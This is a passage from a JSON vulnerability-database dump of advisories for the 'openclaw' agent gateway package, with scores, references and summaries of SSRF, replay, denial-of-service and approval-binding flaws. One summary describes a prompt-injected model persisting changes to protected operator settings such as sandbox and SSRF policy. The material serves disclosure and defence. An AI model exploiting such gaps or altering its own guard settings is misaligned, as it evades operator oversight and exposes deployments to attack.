scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41914","reference_id":"CVE-2026-41914","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41914"},{"reference_url":"https://github.com/advisories/GHSA-3fv3-6p2v-gxwj","reference_id":"GHSA-3fv3-6p2v-gxwj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fv3-6p2v-gxwj"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths","reference_id":"openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":
"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":
"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41914","GHSA-3fv3-6p2v-gxwj"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-75yr-sbce-nkah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89144?format=json","vulnerability_id":"VCID-7akj-469t-57hz","summary":"OpenClaw: Agent gateway config mutations could change protected operator settings\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.\n\nThis is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. 
Severity is medium.\n\n## Fix\n\nOpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.\n\nFix commit:\n\n- `fe30b31a97a917ecc6e92f6c85378b6b20352422`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc"},{"reference_url":"https://github.com/advisories/GHSA-7jm2-g593-4qrc","reference_id":"GHSA-7jm2-g593-4qrc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jm2-g593-4qrc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","pu
rl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-7jm2-g593-4qrc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7akj-469t-57hz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90184?format=json","vulnerability_id":"VCID-7dyw-9b37-yqh4","summary":"OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass\n## Summary\nZalo webhook replay cache cross-target messageId scope bypass\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41402","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11356","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11364","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41402"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41402","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41402"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"C
VSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass"},{"reference_url":"https://github.com/advisories/GHSA-hhq4-97c2-p447","reference_id":"GHSA-hhq4-97c2-p447","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hhq4-97c2-p447"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability"
:"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability"
:"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41402","GHSA-hhq4-97c2-p447"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7dyw-9b37-yqh4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91391?format=json","vulnerability_id":"VCID-7gju-19nh-7bgu","summary":"Duplicate Advisory: OpenClaw's inbound media downloads could exceed configured byte limits before rejection across multiple channels\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rxxp-482v-7mrh. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 fail to consistently enforce configured inbound media byte limits before buffering remote media across multiple channel ingestion paths. 
Remote attackers can send oversized media payloads to trigger elevated memory usage and potential process instability.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/73d93dee64127a26f1acd09d0403b794cdeb4f5c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/73d93dee64127a26f1acd09d0403b794cdeb4f5c"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-inbound-media-download-byte-limit-bypass","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-inbound-media-download-byte-limit-bypass"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32049","reference_id":"CVE-2026-32049","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"v
alue":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32049"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxxp-482v-7mrh","reference_id":"GHSA-rxxp-482v-7mrh","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxxp-482v-7mrh"},{"reference_url":"https://github.com/advisories/GHSA-xq3g-m3j8-2vmm","reference_id":"GHSA-xq3g-m3j8-2vmm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq3g-m3j8-2vmm"}],"fixed_packages":[],"aliases":["GHSA-xq3g-m3j8-2vmm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7gju-19nh-7bgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89799?format=json","vulnerability_id":"VCID-7ntr-5dr5-9uf8","summary":"OpenClaw: Windows-compatible env override keys could bypass system.run approval binding\n## Summary\n\nBefore OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time.\n\n## Impact\n\nAn approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. 
This created an approval-integrity gap for affected host-exec flows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"},{"reference_url":"https://github.com/advisor
